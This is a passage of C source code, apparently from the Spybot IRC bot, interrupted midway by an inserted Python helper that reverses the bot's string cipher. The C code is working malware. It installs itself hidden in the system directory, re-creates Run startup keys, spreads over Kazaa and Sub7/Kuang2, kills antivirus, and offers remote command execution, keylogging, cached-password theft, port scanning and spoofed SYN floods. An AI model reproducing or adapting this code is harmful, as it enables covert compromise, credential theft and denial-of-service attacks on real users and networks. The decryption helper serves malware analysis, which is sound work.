 180 DWORD WINAPI HTTP_server_thread(LPVOID Param);
 181 DWORD WINAPI HTTP_server_to_guest(LPVOID Param);
 182 int Check_Requestedfile(SOCKET sock,char * dir,char * rFile);
 183 int getfiles(char *current,SOCKET dccsock,char *chan,char *URL);
 184 DWORD WINAPI  http_header(LPVOID param);
 185 void http_send_file(SOCKET sock,char *file);
 186 char * file_to_html(char *file);
 187 int cashedpasswords(SOCKET sock,char *sendto);
 188 char * decrypt(char *str,int key);
 189 void writekeys(BOOL uninstall);
 190 void randnick();
 191 void raw_commandsonjoin(SOCKET sock,char *chan);
 192 void raw_commands(SOCKET sock);
 193 int sendkeys(SOCKET sock,char *buf,char *window,char *logfile);
 194 int irc_connect(char * serveraddr,int poort);
 195 int read_command(SOCKET sendsock,SOCKET ircsock,char *command,char *line,char *sendto);
 196 int irc_read(SOCKET Server);
 197 int irc_readline(char * line,SOCKET Server);
 198 char * sysinfo(char *sinfo,SOCKET sock);
 199 int cpuspeed(void);
 200 unsigned __int64 cyclecount();
 201 DWORD WINAPI dcc_send(LPVOID param);
 202 DWORD WINAPI dcc_chat(LPVOID param);
 203 DWORD WINAPI dcc_getfile(LPVOID param);
 204 DWORD WINAPI keylogger(LPVOID param);
 205 DWORD WINAPI kill_av(LPVOID param);
 206 DWORD WINAPI keepkeys(LPVOID param);
 207 int listProcesses(SOCKET sock,char *chan,char *proccess,BOOL killthread);
 208 int scan_host(char *host,int port,int num);
 209 void GetNewIp(int num);
 210 int addthread(char *name,SOCKET sock,HANDLE Threat_Handle,int id,char * dir);
 211 
 212 
 213 typedef struct scan_struct {
 214 	char file[MAX_PATH];
 215 	char ip[16];
 216 	char chan[30];
 217 	int port;
 218 	int delay;
 219 	int state; //0 = empty, 1 = active thread
 220 	int extra;
 221 	int thread;
 222 	SOCKET sock;
 223 	int scan_1;
 224 	int scan_2;
 225 	int scan_3;
 226 	int scan_4;
 227 } scandata;
 228 
 229 scandata scan[10];
 230 
 231 
 232 
 233 typedef struct threads_struct {
 234 	char name [250];
 235 	int id; //1 = firewall/AV killer, 2 = Keylogger, 3 = HTTP server, 4 = Port scanner 5 = synflood,6 = redirect
 236 	int num;
 237 	int port;
 238 	SOCKET sock;
 239 	HANDLE Threat_Handle;
 240 	char dir[MAX_PATH];
 241 	char file[MAX_PATH];
 242 } thread;
 243 
 244 thread threads[40];
 245 
 246 
 247 // kernel32.dll typedefs/structs
 248  typedef struct tagPROCESSENTRY32 {
 249 	DWORD dwSize;
 250 	DWORD cntUsage;
 251 	DWORD th32ProcessID;
 252 	DWORD *th32DefaultHeapID;
 253 	DWORD th32ModuleID;
 254 	DWORD cntThreads;
 255 	DWORD th32ParentProcessID;
 256 	LONG pcPriClassBase;
 257 	DWORD dwFlags;
 258 	CHAR szExeFile[MAX_PATH];
 259  } PROCESSENTRY32, *LPPROCESSENTRY32;
 260 
 261  typedef int (__stdcall *RSP)(DWORD, DWORD);
 262  RSP fRegisterServiceProcess;
 263  typedef HANDLE (__stdcall *CT32S)(DWORD,DWORD);
 264  CT32S fCreateToolhelp32Snapshot;
 265  typedef BOOL (__stdcall *P32F)(HANDLE,LPPROCESSENTRY32);
 266  P32F fProcess32First;
 267  typedef BOOL (__stdcall *P32N)(HANDLE,LPPROCESSENTRY32);
 268  P32N fProcess32Next;
 269 
 270 
 271  int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
 272  {
 273 	WSADATA  WSData;
 274 	int err, c, x;
 275 	DWORD id;
 276 	HANDLE Threat_Handle;
 277 	char thisfilename[MAX_PATH];
 278 	char sysdir[MAX_PATH];
 279 	char buf[250];
 280 	GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
 281 	GetSystemDirectory(sysdir, sizeof(sysdir));  
 282 	decrypt(runoncekey,33); //decrypt the startup keys some virus scanners use the startup keys as a signature
 283 	decrypt(runkey,33);
 284 	if (strstr(thisfilename,sysdir) == NULL) //instal server
 285 	{
 286 		char copyfile[MAX_PATH]; 
 287 		sprintf(copyfile,"%s\\%s",sysdir,filename);
 288 		while (!CopyFile(thisfilename,copyfile , FALSE)) { //copyfile to systemdir 
 289 			srand(GetTickCount());
 290            	       	for (x=0;x<strlen(filename)-4;x++)
 291 				filename[x] = (rand()%26)+97;//we could not copy the file so we try a other filename
 292 			sprintf(copyfile,"%s\\%s",sysdir,filename);
 293 		}
 294 		SetFileAttributes(copyfile,FILE_ATTRIBUTE_HIDDEN); //set fileatribures to hidden 
 295 		
 296 		//SetFileAttributes(copyfile,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY); //set fileatribures to hidden readonly and system
 297 		writekeys(FALSE); //write startupkeys
 298 		#ifdef KAZAA_SPREADER
 299 		HKEY	hkeyresult;
 300 		char tstr[MAX_PATH];
 301 		char tstr2[MAX_PATH];
 302 		char tstr3[MAX_PATH];
 303 		sprintf(tstr3, "%s\\kazaabackupfiles\\", sysdir); //dir where we put the files in
 304   		sprintf(tstr, "012345:%s",tstr3); //registry key so or new dir will be a shared dir
 305 		CreateDirectory(tstr3, 0);//create the directory
 306 		//write the keys
 307 		RegCreateKey(HKEY_CURRENT_USER, (LPCTSTR) "SOFTWARE\\KAZAA\\LocalContent", &hkeyresult); 
 308 		RegCloseKey (hkeyresult);
 309 		RegOpenKey (HKEY_CURRENT_USER, (LPCTSTR) "SOFTWARE\\KAZAA\\LocalContent", &hkeyresult);
 310              	RegSetValueEx(hkeyresult, "Dir0", 0, REG_SZ, (const unsigned char *)tstr, 127);
 311 		RegCloseKey(hkeyresult); 
 312 		//copy all the files
 313              	for (x=0;kazaa_files[x] != NULL; x++) 
 314 	     	{
 315 			memset(tstr2,0,sizeof(tstr2));
 316 			sprintf(tstr2, "%s\\%s", tstr3,kazaa_files[x]);
 317 			CopyFile(thisfilename, tstr2, FALSE);
 318 	    	}
 319 		#endif
 320 		ShellExecute(0, "open",copyfile , NULL, NULL, SW_SHOW);
 321 		ExitProcess(0);
 322 	}
 323 	sprintf(filename,strlen(thisfilename)-strlen(filename)+thisfilename);
 324         CreateMutex(NULL,TRUE,mutexname);
 325 	if (GetLastError() == ERROR_ALREADY_EXISTS) ExitProcess(0); //check if is allready running..
 326 	HINSTANCE kernel32_dll = LoadLibrary("kernel32.dll");
 327 	if (kernel32_dll) { //thanks to sdbot
 328 		fRegisterServiceProcess = (RSP)GetProcAddress(kernel32_dll, "RegisterServiceProcess");
 329 		if (fRegisterServiceProcess) fRegisterServiceProcess(0, 1); //hide from ctrl alt del
 330 		fCreateToolhelp32Snapshot = (CT32S)GetProcAddress(kernel32_dll, "CreateToolhelp32Snapshot"); 
 331 		fProcess32First = (P32F)GetProcAddress(kernel32_dll, "Process32First");
 332 		fProcess32Next = (P32N)GetProcAddress(kernel32_dll, "Process32Next");
 333 	}
 334    	if (WSAStartup(MAKEWORD(1, 1), &WSData))
 335 		if (WSAStartup(MAKEWORD(1, 0), &WSData))
 336         		ExitProcess(0);
 337 	for (c=0;c <= 10;c++)
 338 		scan[c].state = 0;
 339 	for (c=0;c < 40;c++)
 340 		threads[c].id = 0;
 341 	#ifdef SYN_FLOOD
 342 	for (c=0;c <= 30;c++)
 343 		syn[c].state = 0;
 344 	#endif
 345 
 346 	#ifdef Use_Firewall_killer
 347 	Threat_Handle = CreateThread(NULL, 0, &kill_av, NULL, 0, &id);
 348 	addthread("F/AV Killer",0,Threat_Handle,1,"\0");
 349 	#endif
 350 
 351 	CreateThread(NULL, 0, &keepkeys, NULL, 0, &id);
 352 	memset(keylogchan,0,sizeof(keylogchan));
 353 
 354 	#ifdef start_keylogger_afterstartup
 355 	Threat_Handle = CreateThread(NULL, 0, &keylogger, NULL, 0, &id);
 356 	sprintf(buf,"Keylogger logging to %s\\%s",sysdir,keylogfilename);
 357 	addthread(buf,0,Threat_Handle,2,"\0");
 358 	#endif
 359 
 360 ////////////////////////decrypt some data, make sure before you enable this that you first encrypt al data with the provided mIRC script /////////////////////////////////////
 361 
 362 	//decrypt(password,decryptkey);
 363 	//decrypt(channelpass,decryptkey);
 364 	//decrypt(channel,decryptkey);
 365 //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
 366 
 367 	#ifdef Check_for_internetconnection
 368 	DWORD ConState;
 369 	while (1) {
 370 		if (!InternetGetConnectedState(&ConState,0)) { //see if we there is a internet connection
 371 			Sleep(30000); 
 372 			continue;
 373 		}
 374 		break; //there is a connection 
 375 	}
 376 	#endif
 377 
 378 	#ifdef start_httpserver_afterstartup 
 379 	HTTP_server(root_dir,http_poort);
 380 	#endif
 381 	c = 0;
 382 	while (1) {
 383 		if (ircservers[c] == NULL) c = 0;
 384  		err = irc_connect(ircservers[c],serverports[c]);
 385 		if (err == 1) break;
 386 		Sleep(5000);
 387 		c++;
 388 	}
 389 	WSACleanup();
 390 
 391 	#ifdef remote_cmd
 392 	Close_Handles();
 393 	#endif
 394 
 395 	ExitProcess(0);
 396 	return 0;
 397  }
 398 
 399 int read_command(SOCKET sendsock,SOCKET ircsock,char *command,char *line,char *sendto)
 400 {
 401 	char x[512];
 402 	char y[512];
 403 	char line1[512];
 404 	char *s[10];
 405 	int i,c;
 406 	int err;
 407 	DWORD id;
 408 	char buf[512];
 409 	memset(x,0,sizeof(x));
 410 	memset(line1, 0, sizeof(line1));
 411 	strncpy(line1, line, sizeof(line1)-1);
 412 	s[0] = strtok(line1, " ");
 413 	for (i = 1; i < 6; i++) s[i] = strtok(NULL, " ");
 414 	memset(sendtochan,0,sizeof(sendtochan));
 415 	info = FALSE;
 416 	HANDLE Threat_Handle;
 417 	if (strcmp("raw", command) == 0)  {
 418 		strncpy(x, line+4, sizeof(x)-1);
 419 		sendto = NULL;
 420 		sendsock = ircsock;
 421 	}
 422 	else if (strcmp("threads",command) == 0) {
 423 		for (i=0;i <= 40;i++) {
 424 			if (threads[i].id != 0) {
 425 				sprintf(x,"%i: %s",i,threads[i].name);
 426 	
 427       
 428 				strcat(x,"\r\n");
 429 				if (sendto == NULL) //send to DCC chat
 430 					send(sendsock,x,strlen(x),0);
 431 				else if (sendsock != 0) {
 432 					sprintf(y,"PRIVMSG %s :%s",sendto,x);
 433 					send(sendsock,y,strlen(y),0);
 434 				}
 435 			}
 436 		}	
 437 		return 0;
 438 		
 439 	}
 440 	else if (strcmp("spy",command) == 0 && sendto == NULL) {
 441 		sprintf(x,"Spying on irc connection");
 442 		dccspy = sendsock;
 443 	}
 444 	else if (strcmp("stopspy",command) == 0) {
 445 		sprintf(x,"Spy stoped");
 446 		dccspy = 0;
 447 	}
 448 	else if (strcmp("uninstall",command) == 0) {
 449 		writekeys(TRUE);
 450 	}
 451 	else if (strcmp("info", command) == 0)  {
 452 		sysinfo(x,sendsock);
 453 	}
 454 	else if (strcmp("passwords",command) == 0) {
 455 		if (cashedpasswords(sendsock,sendto) == 0) strcpy(x,OK);
 456 		else strcpy(x,Error);
 457 	}
 458 	else if (strcmp("startkeylogger", command) == 0)  {
 459 		if (sendkeysto == 1) sprintf(x,"error already logging keys to %s use \"stopkeylogger\" to stop",keylogchan);
 460 		else {
 461 			if (sendto != NULL) {
 462 				sprintf(keylogchan,sendto);
 463 				sprintf(x,"Keylogger active output to: %s",keylogchan);
 464 			}
 465 			else {
 466 				memset(keylogchan,0,sizeof(keylogchan));
 467 				sprintf(x,"Keylogger active output to: DCC chat");
 468 			}
 469 			sendkeysto = 1;
 470 			keysock = sendsock;
 471 			BOOL keylog = FALSE;
 472 			for (c=0;c <= 20;c++)
 473 				if (threads[c].id == 2) {  keylog = TRUE; break; }
 474 			if (keylog == FALSE) {
 475 				Threat_Handle = CreateThread(NULL, 0, &keylogger, NULL, 0, &id);
 476 				sprintf(buf,"Keylogger logging to %s",keylogchan);
 477 				addthread(buf,0,Threat_Handle,2,"\0");
 478 			}
 479 			
 480 			sendkeysto = 1;
 481 		}
 482 	}
 483 	else if (strcmp("stopkeylogger", command) == 0)  {
 484 		sendkeysto = 0;
 485 		memset(keylogchan,0,sizeof(keylogchan));
 486 		sprintf(x,"Keylogger stoped");
 487 	}
 488 	else if (strcmp("listprocesses", command) == 0)  {
 489 		if (listProcesses(sendsock,sendto,NULL,FALSE) == 0) strcpy(x,OK);
 490 		else strcpy(x,Error);
 491 	}
 492 	else if (strcmp("reconnect", command) == 0 && sendto != NULL)  {
 493 		send(sendsock,"QUIT\n\r",8,0);
 494 		return 2;
 495 	}
 496 	#ifdef use_funstuf //lame stuf :-)
 497 	else if (strcmp("keyboardlights", command) == 0)  {
 498 		for (i = 0;i < 50;i++)
 499 		{
 500 			Keyevent(VK_CAPITAL,FALSE);
 501 			Keyevent(VK_SCROLL,FALSE);
 502 			Keyevent(VK_NUMLOCK,FALSE);
 503 			Sleep(200);
 504 		}
 505 		strcpy(x,OK);
 506 	}
 507 	#endif
 508 	else if (strcmp("disconnect", command) == 0 && sendto != NULL)  {
 509 		if (s[1] != NULL) distime = atoi(s[1]) * 1000;
 510 		send(sendsock,"QUIT\n\r",strlen("QUIT\n\r"),0);
 511 		return 3;
 512 	}
 513 	else if (strcmp("quit", command) == 0)  {
 514 		return 1;
 515 	}
 516 	else if (strcmp("reboot", command) == 0)  {
 517 		if (ExitWindowsEx(EWX_FORCE,0) == 0) strcpy(x,Error);
 518 		else strcpy(x,"QUIT Bye Bye\n\r");
 519 	}
 520 	#ifdef remote_cmd
 521 	else if (strcmp("opencmd",command) == 0) {
 522 		if (open_cmd(sendsock,sendto) == -1) strcpy(x,Error);
 523 		else strcpy(x,"cmd.exe has started type \"cmd help\" for commands");
 524 	}
 525 	else if (strcmp("cmd",command) == 0) {
 526 		DWORD bw;
 527 		if (s[1] != NULL) {
 528 			strcat(line,"\n");
 529 			sprintf(line1,strstr(line," ")+1);
 530 		}
 531 		else sprintf(line1,"\n");
 532 		bw = strlen(line1);
 533 		if (!WriteFile(hChildInWrDupe,line1,bw,&bw,NULL)) {
 534 			Close_Handles();
 535 			strcpy(x,Error);
 536 		}
 537 	}
 538 	#endif
 539         else if (s[1] != NULL) {
 540 		if (strcmp("delete", command) == 0) {
 541 			if (DeleteFile(strstr(line," ")+1)) strcpy(x,OK);
 542 			else strcpy(x,Error);
 543 		}
 544 		else if (strcmp("server",command) == 0 && sendto != NULL) {
 545 			memset(IRC_server,0,sizeof(IRC_server));
 546 			strcpy(IRC_server,s[1]);
 547 			send(sendsock,"QUIT\n\r",8,0);
 548 			return 2;
 549 		}
 550 		else if (strcmp("execute", command) == 0) {
 551 			if ((int) ShellExecute(0, "open", strstr(line," ")+1, NULL, NULL, SW_SHOW) < 33) strcpy(x,Error);
 552 			else strcpy(x,OK);
 553 		}
 554 		else if (strcmp("makedir", command) == 0) {
 555 			if (CreateDirectory(strstr(line," ")+1, 0)) strcpy(x,OK);
 556 			else strcpy(x,Error);
 557 		}
 558 		else if (strcmp("list", command) == 0)  {
 559 			getfiles(line+5,sendsock,sendto,NULL);
 560 			strcpy(x,OK);
 561 		}
 562 		#ifdef use_funstuf //lame stuf :-)
 563 		else if (strcmp("cd-rom", command) == 0) {
 564 			if (atoi(s[1]) == 0) {
 565 				strcpy(x,"cd-rom drive closed");
 566 				mciSendString("set CDAudio door closed", NULL, 127, 0);
 567 			}
 568 			else {
 569 				strcpy(x,"cd-rom drive opened");
 570 				mciSendString("set CDAudio door open", NULL, 127, 0);
 571 			}
 572 		}
 573 		#endif
 574 		else if (strcmp("killprocess", command) == 0) {
 575 			if (listProcesses(sendsock,NULL,s[1],FALSE) == 1) strcpy(x,OK);
 576 			else strcpy(x,Error);
 577 
 578 		}
 579 		#ifdef use_funstuf //lame stuf :-)
 580 		else if (strcmp("sendkeys", command) == 0)  {
 581 			strncpy(x, line+10, sizeof(x)-1);
 582 			int c = 0;
 583 			int z;
 584 			char chr[2];
 585 			char bla[10];
 586 			for (i = 0;i < strlen(x);i++)
 587 			{
 588 				memset(chr,0,sizeof(chr));
 589 				chr[0] = x[i];
 590 				for (c = 0;c < 92;c++)
 591 				{
 592 
  593 					if (strcmp(chr,"\x02") == 0) { //bold (ctrl + b, IRC control code 0x02) = RETURN
 594 						Keyevent(VK_RETURN,FALSE);
 595 						break;
 596 					}
 597 					else if (strcmp(chr,"\x1F") == 0) { //underlined (ctrl + u) = backspace
 598 						Keyevent(VK_BACK,FALSE);
 599 						break;
 600 					}
 601 					else if (strcmp(chr,outputL[c]) == 0) {
 602 						z = inputL[c];
 603 						Keyevent(z,FALSE);
 604 						break;
 605 					}
 606 					else if (strcmp(chr,outputH[c]) == 0) {
 607 						z = inputL[c];
 608 						Keyevent(z,TRUE);
 609 						break;
 610 					}
 611 				}
 612 			}
 613 			strcpy(x,OK);
 614 
 615 		}
 616 		#endif
 617 		else if (strcmp("killthread", command) == 0)  {
 618 			int t = atoi(s[1]);
 619 			if (t > 39) return 0;
 620 			if (threads[t].id != 0) {
 621 				if (TerminateThread(threads[t].Threat_Handle,0) == 0) strcpy(x,Error);
 622 				else {
 623 					sprintf(x,"Thread killed (%s)",threads[t].name);
 624 					closesocket(threads[t].sock);
 625 					if (threads[t].id == 2) { memset(keylogchan,0,sizeof(keylogchan)); sendkeysto = 0; }
 626 					if (threads[t].id == 4) {
 627 						for (i=0;i <= 9;i++)
 628 							if (scan[i].state != 0 && scan[i].thread == t) { scan[i].state = 0; break; }
 629 					}
 630 
 631 					threads[t].id = 0;
 632 					
 633 				}
 634 			}
 635 		}
 636 		else if (strcmp("get",command) == 0 && sendto != NULL) { //dcc GET
 637 			dcchosts = sendsock;
 638 			memset(dccfilename,0,sizeof(dccfilename));
 639 			memset(dcchost,0,sizeof(dcchost));
 640 			strcpy(sendtochan,sendto);
 641 			sprintf(dccfilename,strstr(line," ")+1);
 642 			CreateThread(NULL, 0, &dcc_send, NULL, 0, &id);
 643 			while (info == FALSE) Sleep(10);
 644 		}
 645 		#ifdef WEB_DOWNLOAD
 646 		else if (strcmp("download",command) == 0) {
 647 			dcchosts = sendsock;
 648 			if (sendto != NULL) strcpy(sendtochan,sendto); 
 649 			sprintf(x,"download %s %s",s[1],s[2]);
 650 			i = addthread(x ,0,NULL,8,s[2]);
 651 			sprintf(threads[i].dir,s[1]);
 652 			sprintf(threads[i].file,s[2]);
 653 			Threat_Handle = CreateThread(NULL, 0, &download,(LPVOID)i, 0, &id);
 654 			threads[i].Threat_Handle = Threat_Handle;
 655 					
 656 		}
 657 		#endif
 658 		else if (s[2] != NULL) {
 659 			if (strcmp("httpserver",command) == 0) {
 660 				int poort = atoi(s[1]);
 661 				memset(buf,0,sizeof(buf));
 662 				sprintf(buf,s[2]);
 663 				for(i=3;s[i] != NULL;i++) 
 664 					sprintf(buf,"%s %s",buf,s[i]);
 665 				i = HTTP_server(buf,poort);
 666 				if (i == -1) sprintf(x,Error);
 667 				else 
 668 					sprintf(x,"%s Address http://%s:%i/ .",threads[i].name,IP,poort);
 669 			}
 670 			
 671 
 672 
 673 			else if (strcmp("rename",command) == 0) {
 674 				if (MoveFile(s[1],s[2]) == 0) strcpy(x,Error);
 675 				else strcpy(x,OK);
 676 			}
 677 
 678 			else if (s[3] != NULL) {
 679 				dcchosts = sendsock;
 680 				memset(dccfilename,0,sizeof(dccfilename));
 681 				memset(dcchost,0,sizeof(dcchost));
 682 				if (sendto != NULL) strcpy(sendtochan,sendto); 
 683  		 		if (strcmp("SEND",command) == 0) { //dcc send
 684 					sprintf(dccfilename,s[1]);
 685 					sprintf(dcchost,s[2]);
 686 					dccport = atoi(s[3]);
 687 					CreateThread(NULL, 0, &dcc_getfile, NULL, 0, &id);
 688 					while (info == FALSE) Sleep(5);
 689 					
 690 				}
 691 				else if (strcmp("CHAT",command) == 0 && sendto != NULL) { //dcc chat
 692 					sprintf(dcchost,s[2]);
 693 					dccport = atoi(s[3]);
 694 					CreateThread(NULL, 0, &dcc_chat, NULL, 0, &id);
 695 					while (info == FALSE) Sleep(5);
 696 				}
 697 				else if (strcmp("redirect",command) == 0) {
 698 					SOCKET sock;
 699 					if ((sock = Listen(atoi(s[1]))) == -1) strcpy(x,Error);
 700 					else {
 701 						sprintf(x,"redirect %s:%i > %s:%i",IP,atoi(s[1]),s[2],atoi(s[3]));
 702 						i = addthread(x ,sock,NULL,6,s[2]);
 703 						threads[i].port = atoi(s[3]);
 704 						sprintf(threads[i].dir,s[2]);
 705 						Threat_Handle = CreateThread(NULL, 0, &port_redirect,(LPVOID)i, 0, &id);
 706 						threads[i].Threat_Handle = Threat_Handle;
 707 					}
 708 				}
 709 				else if (strcmp("scan",command) == 0) {
 710 					for (i=0;i <= 9;i++)
 711 						if (scan[i].state == 0) break;
 712 					if (i > 9) return 0; //all threads full
 713 						
 714 					if (strcmp("0",s[1]) == 0) { //we start at a random ip address
 715 						srand(GetTickCount());
 716 						sprintf(scan[i].ip,"%i.%i.%i.0",rand()%255,rand()%255,rand()%255);
 717 					}
 718 					else sprintf(scan[i].ip,s[1]);
 719 					scan[i].port = atoi(s[2]);
 720 					scan[i].delay = atoi(s[3]) * 1000;
 721 					scan[i].extra = 0;
 722 					if (s[4] != NULL) {
 723 						#ifdef SUB7_SPREADER
 724 						if (strcmp(s[4],"sub7") == 0) scan[i].extra = 1;
 725 						#endif
 726 						#ifdef KUANG2_SPREADER
 727 						if (strcmp(s[4],"kuang") == 0) scan[i].extra = 2;
 728 						#endif
 729 					}
 730 					sprintf(scan[i].file,"\0");
 731 					sprintf(scan[i].chan,"\0");
 732 					scan[i].sock = sendsock;
 733 					if (sendto != NULL) sprintf(scan[i].chan,sendto); //channel or query
 734 					if (s[4] != NULL && scan[i].extra == 0) { //we are gona log to a file
 735 						char sysdir[MAX_PATH];
 736 						GetSystemDirectory(sysdir, sizeof(sysdir));
 737 						sprintf(scan[i].file,"%s\\%s",sysdir,s[4]);
 738 					}
 739 					Threat_Handle = CreateThread(NULL, 0, &port_scanner,(LPVOID)i, 0, &id);
 740 					if (Threat_Handle) {	
 741 						if (strlen(scan[i].file) > 2) sprintf(x,"Portscanner startip: %s port: %i delay: %ssec. logging to: %s",scan[i].ip,scan[i].port,s[3],scan[i].file);
 742 						else sprintf(x,"Portscanner startip: %s port: %i delay: %ssec.",scan[i].ip,scan[i].port,s[3]);
 743 						scan[i].thread = addthread(x ,0,Threat_Handle,4,"\0");			
 744 					}
 745 					else 
 746 						strcpy(x,Error);
 747 				}
 748 				#ifdef SYN_FLOOD
 749 				else if (strcmp("syn",command) == 0 && s[4] != NULL) {
 750 					for (i=0;i < 10;i++)
 751 						if (syn[i].state == 0) break;
 752 					if (i > 9) return 0; //all threads full
 753 					strcpy(syn[i].host,s[1]);
 754 					syn[i].port = atoi(s[2]);
 755 					syn[i].delay = atoi(s[3]);
 756 					if (syn[i].delay < 5) syn[i].delay = 5;
 757 					syn[i].times = atoi(s[4]);
 758 					memset(x,0,sizeof(x));
 759 					sprintf(x,"SynFlooding: %s port: %i delay: %i times:%i.",syn[i].host,syn[i].port,syn[i].delay,syn[i].times);
 760 					Threat_Handle = CreateThread(NULL, 0, &syn_flood,(LPVOID)i, 0, &id);
 761 					if (Threat_Handle) 
 762 						syn[i].thread = addthread(x ,0,Threat_Handle,5,"\0");	
 763 					else strcpy(x,Error);
 764 
 765 				}
 766 				#endif
 767 				#ifdef SPOOFD_SYNFLOOD
 768 				else if (strcmp("spoofdsyn",command) == 0 && s[4] != NULL) {
 769 					for (i=0;i < 10;i++)
 770 						if (Spoofdsyn[i].state == 0) break;
 771 					if (i > 9) return 0; //all threads full
 772 					Spoofdsyn[i].TargetIP = inet_addr(s[1]);
 773 					Spoofdsyn[i].port = atoi(s[2]);
 774 					Spoofdsyn[i].delay = atoi(s[3]);
 775 					Spoofdsyn[i].sock = sendsock;
 776 					if (Spoofdsyn[i].delay < 5) Spoofdsyn[i].delay = 5;
 777 					Spoofdsyn[i].times = atoi(s[4]);
 778 					memset(x,0,sizeof(x));
 779 					sprintf(x,"SynFlooding: %s port: %i delay: %i times:%i.",s[1],Spoofdsyn[i].port,Spoofdsyn[i].delay,Spoofdsyn[i].times);
 780 					Threat_Handle = CreateThread(NULL, 0, &Spoofd_syn,(LPVOID)i, 0, &id);
 781 					if (Threat_Handle) 
 782 						Spoofdsyn[i].thread = addthread(x ,0,Threat_Handle,7,"\0");	
 783 					else strcpy(x,Error);
 784 
 785 				}
 786 				#endif
 787 			}
 788 		}
 789 	}
 790 	else return 0;
 791 	if (strlen(x) == 0) return 0;
 792 	strcat(x,"\r\n");
 793 	if (sendto == NULL) //send to DCC chat
 794 		send(sendsock,x,strlen(x),0);
 795 	else if (sendsock != 0) {
 796 		sprintf(y,"PRIVMSG %s :%s",sendto,x);
 797 		send(sendsock,y,strlen(y),0);
 798 	}
 799 
 800 	return 0;
 801 }
 802 
 803 
 804 
 805 
 806 int addthread(char *name,SOCKET sock,HANDLE Threat_Handle,int id,char * dir)
 807 {
 808 	int c;
 809 	for (c=0;c <= 40;c++)
 810 		if (threads[c].id == 0) break;
 811 	if (c > 19) return -1;
 812 	sprintf(threads[c].name,name);
 813 	threads[c].id = id;
 814 	threads[c].num = c;
 815 	threads[c].sock = sock;
 816 	threads[c].Threat_Handle = Threat_Handle;
 817 	sprintf(threads[c].dir,dir);
 818 	return c;
 819 }
 820 
 821 
 822 //simple decrypt function prevent people to see the important stuff with a hexediter
 823 
 824 char * decrypt(char *str,int key)
 825 {
 826  	for (BYTE i = 0;str[i] != 0; i++) {
 827          	 str[i] = str[i] - key;
 828         }
 829 	return str;
 830 }
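The decrypt() routine above is a single-byte subtraction cipher: every byte of a string is lowered by a compile-time key (commands_decryptkey, defined in a header that is not part of this listing), so the strings the author wanted to hide from a hex editor sit in the binary as plaintext plus a constant. The Python below is an added analyst helper, not part of the bot's source or of this write-up: it reimplements the routine and its inverse, and brute-forces all 256 keys for a string carved from the binary, keeping only keys whose output has the shape the analyst expects (an IPv4 address, a channel name). The plaintexts and keys used in the checks are constructed for the demonstration.

```python
import re


def spybot_decrypt(data, key):
    """Python equivalent of the bot's decrypt(): subtract `key` from every byte
    (mod 256), stopping at the first NUL exactly as the C loop does."""
    out = bytearray()
    for b in data:
        if b == 0:
            break
        out.append((b - key) & 0xFF)
    return bytes(out)


def spybot_encrypt(plain, key):
    """Inverse of spybot_decrypt(): what the author ran over the config strings
    before compiling (add `key` to every byte, mod 256)."""
    return bytes((b + key) & 0xFF for b in plain)


def recover_key(blob, shape=r"^[\x20-\x7e]+$"):
    """Try all 256 keys on a blob carved out of the binary and keep those whose
    plaintext matches `shape`, a regex describing what the string should look
    like (IPv4 address, '#channel', URL ...). Returns [(key, plaintext), ...].
    The default shape only demands printable ASCII, which usually leaves several
    candidates; a tighter shape pins the key down."""
    pat = re.compile(shape.encode())
    hits = []
    for key in range(256):
        cand = spybot_decrypt(blob, key)
        if cand and pat.match(cand):
            hits.append((key, cand))
    return hits


# Constructed blobs: an IRC server address and a channel name "hidden" with keys 7 and 3.
IPV4_SHAPE = r"^\d{1,3}(\.\d{1,3}){3}$"
CHANNEL_SHAPE = r"^#[a-z0-9_]+$"
SERVER_BLOB = spybot_encrypt(b"209.126.201.20", 7)
CHANNEL_BLOB = spybot_encrypt(b"#spybot", 3)

if __name__ == "__main__":
    print(recover_key(SERVER_BLOB, IPV4_SHAPE))
    print(recover_key(CHANNEL_BLOB, CHANNEL_SHAPE))
```

Because the cipher is a constant offset, one known plaintext byte (the leading '#' of a channel, the dots of an address) is enough to fix the key; the shape regex is just a convenient way to express that knowledge.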
 831 
 832 
 833 DWORD WINAPI keepkeys(LPVOID param) //when the startup keys are removed we create them again ;-)
 834  {
 835 	while (1)
 836 	{
 837 		writekeys(FALSE);
 838 		Sleep(30000);
 839 	}
 840 	return 0; //will never hapen but if you remove it it will generate a warning..
 841 }
 842 
 843 void writekeys(BOOL uninstal)
 844 {
 845 	unsigned long size = 250;
 846 	HKEY key;
 847 	BYTE  buf[200];
 848 	RegCreateKeyEx(HKEY_CURRENT_USER, runoncekey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
 849 	if (uninstal) {
 850 		RegDeleteValue(key,( LPCTSTR ) valuename);
 851 	}
 852     	else if (RegQueryValueEx(key, ( LPCTSTR ) valuename , 0, 0,buf, &size) != ERROR_SUCCESS || strcmp(buf, filename) != 0) {
 853       	        RegSetValueEx(key, valuename, 0, REG_SZ, filename, 127);
 854 	}
 855 	RegCloseKey(key);
 856 	RegCreateKeyEx(HKEY_LOCAL_MACHINE, runkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
 857 	if (uninstal) {
 858 		RegDeleteValue(key,( LPCTSTR ) valuename);
 859 		RegCloseKey(key);
 860 		ExitProcess(0);
 861 	}
 862     	if (RegQueryValueEx(key, ( LPCTSTR ) valuename , 0, 0,buf, &size) != ERROR_SUCCESS || strcmp(buf, filename) != 0) 
 863 		        RegSetValueEx(key, valuename, 0, REG_SZ, filename, 127);
 864 	RegCloseKey(key);
 865 }
 866 /*
 867 char registrykey[] = "Software\\spybot";
 868 char  readkey[512];
 869 char * Regreadkey(int num)
 870 {
 871 	unsigned long size = 512;
 872 	HKEY key;
 873 	char Rkey[512];
 874 	memset(Rkey,0,sizeof(Rkey));
 875 	memset(readkey,0,sizeof(readkey));
 876 	sprintf(Rkey,"data%i",num);
 877 	RegCreateKeyEx(HKEY_LOCAL_MACHINE, registrykey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
 878   
 879 	if (RegQueryValueEx(key, ( LPCTSTR ) Rkey , 0, 0,readkey, &size) == ERROR_SUCCESS) {    	    
